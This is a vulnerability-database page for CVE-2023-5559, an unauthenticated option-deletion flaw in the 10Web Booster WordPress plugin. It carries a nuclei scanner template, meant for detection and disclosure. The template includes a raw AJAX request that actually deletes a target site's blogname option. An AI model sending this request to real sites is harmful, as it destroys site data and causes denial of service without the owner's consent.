Lucene search
K

10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

Unauthenticated users can delete arbitrary options via AJAX in 10Web Booster before 2.24.18.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-5559
17 Dec 202309:06
circl
CNNVD
WordPress plugin 10Web Booster security vulnerability
27 Nov 202300:00
cnnvd
CVE
CVE-2023-5559
27 Nov 202316:22
cve
Cvelist
CVE-2023-5559 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion
27 Nov 202316:22
cvelist
EUVD
EUVD-2023-57859
27 Nov 202316:22
euvd
NVD
CVE-2023-5559
27 Nov 202317:15
nvd
OSV
CVE-2023-5559
27 Nov 202317:15
osv
Prion
Design/Logic Flaw
27 Nov 202317:15
prion
Positive Technologies
PT-2023-32175
27 Nov 202300:00
ptsecurity
VulnCheck KEV
VulnCheck KEV: CVE-2023-5559
29 Oct 202300:00
vulncheck_kev
Rows per page
id: CVE-2023-5559

info:
  name: 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion
  author: daffainfo
  severity: critical
  description: |
    The 10Web Booster WordPress plugin before 2.24.18 does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.
  impact: |
    Unauthenticated attackers can delete arbitrary WordPress options from the database, leading to denial of service and potential site malfunction.
  remediation: |
    Update 10Web Booster plugin to version 2.24.18 or later.
  reference:
    - https://wpscan.com/vulnerability/eba46f7d-e4db-400c-8032-015f21087bbf/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5559
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2023-5559
    epss-score: 0.02811
    epss-percentile: 0.84803
    cpe: cpe:2.3:a:10web:10web_booster:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: 10web_booster
    framework: wordpress
    publicwww-query: "/wp-content/plugins/tenweb-speed-optimizer"
  tags: cve,cve2023,wordpress,wp-plugin,wp,10web,vkev,intrusive,vuln

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json"
        - "?rest_route=/"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "{\"name\":\"", "\"description\":")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=two_activate_score_check&nonce=blogname

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json"
        - "?rest_route=/"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"name\":false")'
        condition: and
# digest: 4a0a00473045022100c76a9f4cf8e9da65140ff274afe35a43fbf704dd631afa41c6da4c707986ad3302203f272b11d16b63f278704c68d5dec83b9387db4af95cf3abb2eafcccff5f351d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.1
EPSS0.02811
11